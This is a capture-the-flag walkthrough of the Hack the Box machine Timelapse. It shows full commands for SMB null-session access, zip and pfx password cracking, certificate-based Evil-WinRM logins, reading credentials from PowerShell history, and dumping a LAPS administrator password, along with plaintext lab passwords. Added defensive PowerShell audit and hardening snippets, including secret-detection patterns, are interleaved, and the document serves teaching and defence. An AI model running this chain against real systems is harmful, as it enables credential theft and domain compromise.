Hack the Box: Timelapse

Enumeration

Nmap

The Nmap scan shows, among other things, that TCP ports 53 (DNS), 88 (Kerberos), 445 (SMB), and 5986 (WinRM over HTTPS) are open on the target. The target is part of an Active Directory domain called timelapse.htb; the computer name is DC01.

sudo nmap -sVC -Pn -p- 10.10.11.152

SMB

With smbclient we were able to list the available shares using a null session (no credentials).

smbclient -L 10.10.11.152 -N

We were able to access a share called Shares. It contains two folders: Dev and HelpDesk.
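The null-session listing above works only because the file server permits anonymous access to that share. The following audit snippet is an added example, not part of the write-up, and is meant to be run in an elevated PowerShell on the Windows host that serves the shares (DC01 in this box). It reads the LanmanServer parameters that govern null sessions and flags share ACL entries granted to Everyone or ANONYMOUS LOGON; the registry value names and the SmbShare cmdlets are standard Windows items, nothing else is assumed.

```powershell
# Added audit snippet (not from the write-up): check whether null-session
# (anonymous) access to SMB shares is possible on this host.
$paramsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$params = Get-ItemProperty -Path $paramsKey

# RestrictNullSessAccess = 1 (or absent, which defaults to restricted) blocks
# anonymous access to every share except those listed in NullSessionShares.
$restrict = $params.RestrictNullSessAccess
if ($null -eq $restrict -or $restrict -eq 1) {
    Write-Host 'RestrictNullSessAccess: restricted (OK)'
} else {
    Write-Warning "RestrictNullSessAccess = $restrict : null sessions may reach shares"
}

# Shares explicitly exempted from the restriction are a finding by themselves.
if ($params.NullSessionShares) {
    Write-Warning ('NullSessionShares: ' + ($params.NullSessionShares -join ', '))
}

# "Let Everyone permissions apply to anonymous users" widens Everyone ACEs to
# anonymous callers; 1 means enabled.
$lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
if ($lsa.EveryoneIncludesAnonymous -eq 1) {
    Write-Warning 'EveryoneIncludesAnonymous is enabled'
}

# Share-level ACLs: report Allow entries for Everyone or ANONYMOUS LOGON on
# non-administrative shares (Special = $true marks C$, ADMIN$, IPC$ and so on).
Get-SmbShare | Where-Object { -not $_.Special } | ForEach-Object {
    $shareName = $_.Name
    Get-SmbShareAccess -Name $shareName | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.AccountName -match 'Everyone|ANONYMOUS LOGON'
    } | ForEach-Object {
        Write-Warning "Share '$shareName' grants $($_.AccessRight) to $($_.AccountName)"
    }
}
```

On a hardened host the script prints only the "restricted (OK)" line; any warning points at the exact setting or share ACE that lets an unauthenticated client enumerate and read the share, as happened with Shares above.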

From the Dev directory we downloaded a zip file called winrm_backup.zip to the attacking machine.

cd Dev
get winrm_backup.zip

Unzipping winrm_backup.zip required a password.

We cracked the zip password (supremelegacy) with fcrackzip. After unzipping we found a PKCS#12 file, legacyy_dev_auth.pfx. Importing the certificate from the pfx file required another password, which was not supremelegacy.

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip
unzip winrm_backup.zip

We converted the pfx file to a hash with pfx2john and then cracked the hash with John the Ripper.

pfx2john legacyy_dev_auth.pfx > hash
john -w=/usr/share/wordlists/rockyou.txt hash

Using the cracked password thuglegacy, we extracted the private key and the certificate from the pfx file with OpenSSL.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem

Foothold

Since port 5986 (WinRM over HTTPS) is open on the target, we can use Evil-WinRM with the -c and -k flags to pass the certificate and the key for authentication, adding the -S flag to enable SSL. This gave us a shell as the user legacyy.

evil-winrm -i 10.10.11.152 -c cert.pem -k key.pem -S
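A certificate only logs a client in because WinRM on the host has certificate authentication enabled and holds a client-certificate mapping that ties the certificate's subject and issuer to an account. The snippet below is an added example, not from the write-up, for an administrator of the host: it lists those mappings through the WSMan: provider so a leaked .pfx such as legacyy_dev_auth.pfx can be traced to the mapping that makes it a credential. The WSMan: paths and item names are the standard ones; no other names are assumed.

```powershell
# Added audit snippet (not from the write-up): inventory WinRM certificate logon
# on this host. Run in an elevated PowerShell on the WinRM server (DC01 here).

# Is certificate authentication accepted by the WinRM service at all?
$certAuth = (Get-Item WSMan:\localhost\Service\Auth\Certificate).Value
Write-Host "WinRM certificate authentication enabled: $certAuth"

# Each child of WSMan:\localhost\ClientCertificate is one mapping with the
# properties URI, Subject, Issuer, UserName and Enabled.
$mappings = Get-ChildItem WSMan:\localhost\ClientCertificate | ForEach-Object {
    $props = Get-ChildItem $_.PSPath
    [pscustomobject]@{
        Subject = ($props | Where-Object Name -eq 'Subject').Value
        Issuer  = ($props | Where-Object Name -eq 'Issuer').Value
        MapsTo  = ($props | Where-Object Name -eq 'UserName').Value
        Enabled = ($props | Where-Object Name -eq 'Enabled').Value
    }
}

if ($mappings) {
    $mappings | Format-Table -AutoSize
} else {
    Write-Host 'No client-certificate mappings configured'
}

# Mitigations: remove a mapping whose certificate is no longer trusted, or, when
# certificate logon is not needed, switch it off so that a leaked backup of a
# .pfx is no longer a usable login credential.
#   Remove-Item -Path 'WSMan:\localhost\ClientCertificate\<mapping name>' -Recurse
#   Set-Item WSMan:\localhost\Service\Auth\Certificate -Value $false
```

The mapping entry that the Subject column reveals is the thing to review: the account it maps to should be a low-privilege one, and the private key behind the certificate should never end up in a backup archive on a readable share, let alone one protected only by a dictionary word.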

Checking the PowerShell command-line history, we find a new set of credentials: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
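The credentials were recoverable because PSReadLine writes every interactive command line to ConsoleHost_history.txt, including ones that carry a password as an argument. The following profile snippet is an added example, not from the write-up: it uses PSReadLine's -AddToHistoryHandler option (a real PSReadLine 2.x option) to refuse to record such lines, and shows the alternative of not persisting history at all. The regular expressions are my own choice and are only a starting point.

```powershell
# Added hardening snippet (not from the write-up): place in $PROFILE so that
# command lines containing secrets are never written to ConsoleHost_history.txt.
# Requires PSReadLine 2.x (Get-Module PSReadLine shows the version).

Set-PSReadLineOption -AddToHistoryHandler {
    param([string]$line)

    # Patterns matching the kind of command that leaked svc_deploy's password:
    # credentials passed inline on the command line.
    $secretPatterns = @(
        '(^|\s)-p(assword)?\s+\S',   # -p / -password followed by a value
        'ConvertTo-SecureString',    # plaintext to SecureString conversions
        'AsPlainText',               # usually accompanies the line above
        'PSCredential\s*\('          # hand-built credential objects
    )
    foreach ($pattern in $secretPatterns) {
        if ($line -match $pattern) {
            return $false            # do not save this line to history
        }
    }
    return $true                     # everything else is recorded as usual
}

# Stricter alternative for shared or administrative accounts: keep history in
# memory for the session only and never touch the history file.
# Set-PSReadLineOption -HistorySaveStyle SaveNothing

# Where history is currently being written, for the account running this profile.
(Get-PSReadLineOption).HistorySavePath
```

Whichever option is chosen, existing history files remain on disk and should be reviewed and removed separately; the handler only affects lines typed after the profile is loaded.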

Using those credentials we were able to log in as the user svc_deploy.

evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

The user flag can be obtained from the directory C:\Users\legacyy\Desktop.

Privilege Escalation

The user svc_deploy is a member of a group called LAPS_Readers, so we can assume that the Active Directory domain uses the Local Administrator Password Solution (LAPS).

net user svc_deploy

Checking the local group “administrators”, we can see an admin account called Administrator.

We double-checked the computer name with the PowerShell variable $env:COMPUTERNAME and then read the LAPS password with the command:

Get-ADComputer -Identity DC01 -Properties ms-Mcs-AdmPwd | Select-Object -ExpandProperty ms-Mcs-AdmPwd
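LAPS is working as designed here; the weakness is that a service account sits in a group allowed to read ms-Mcs-AdmPwd for the domain controller. The snippet below is an added example, not from the write-up, showing how a domain administrator enumerates who holds that right. It assumes the legacy LAPS management module AdmPwd.PS and the ActiveDirectory module are installed, and uses the OU path "OU=Domain Controllers,DC=timelapse,DC=htb" derived from the write-up's domain name; the cmdlets and attribute names are the standard ones.

```powershell
# Added audit snippet (not from the write-up): find every principal that can
# read the LAPS password attribute ms-Mcs-AdmPwd under a given OU.
$ou = 'OU=Domain Controllers,DC=timelapse,DC=htb'   # assumed DN for the write-up's domain

# Method 1: the LAPS management module reports holders of the extended right
# that allows reading the confidential attribute.
Import-Module AdmPwd.PS
Find-AdmPwdExtendedRights -Identity $ou | ForEach-Object {
    foreach ($holder in $_.ExtendedRightHolders) {
        [pscustomobject]@{ ObjectDN = $_.ObjectDN; CanReadAdmPwd = $holder }
    }
} | Format-Table -AutoSize

# Method 2: inspect the OU's ACL directly, matching ACEs whose ObjectType is the
# schema GUID of ms-Mcs-AdmPwd. Useful where AdmPwd.PS is not installed.
Import-Module ActiveDirectory
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attr = Get-ADObject -SearchBase $schemaNC -Filter "name -eq 'ms-Mcs-AdmPwd'" -Properties schemaIDGUID
$admPwdGuid = [guid]$attr.schemaIDGUID

(Get-Acl -Path "AD:\$ou").Access |
    Where-Object {
        $_.ObjectType -eq $admPwdGuid -and
        $_.AccessControlType -eq 'Allow' -and
        $_.ActiveDirectoryRights -match 'ExtendedRight|ReadProperty|GenericAll'
    } |
    Select-Object IdentityReference, ActiveDirectoryRights, InheritanceType |
    Format-Table -AutoSize

# Groups that appear in the output (LAPS_Readers in this box) deserve a
# membership review: each member is one compromise away from the DC's local
# Administrator password.
```

The second method also surfaces principals granted GenericAll or broad ReadProperty on the OU, which the LAPS module's report can miss because they hold the right implicitly rather than through the specific extended right.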

We then logged in as the user administrator with Evil-WinRM.

evil-winrm -i 10.10.11.152 -u administrator -p '1%zO#25D/4gfe/.[k0h![o%5' -S

The root flag can be obtained from the directory C:\Users\TRX\Desktop.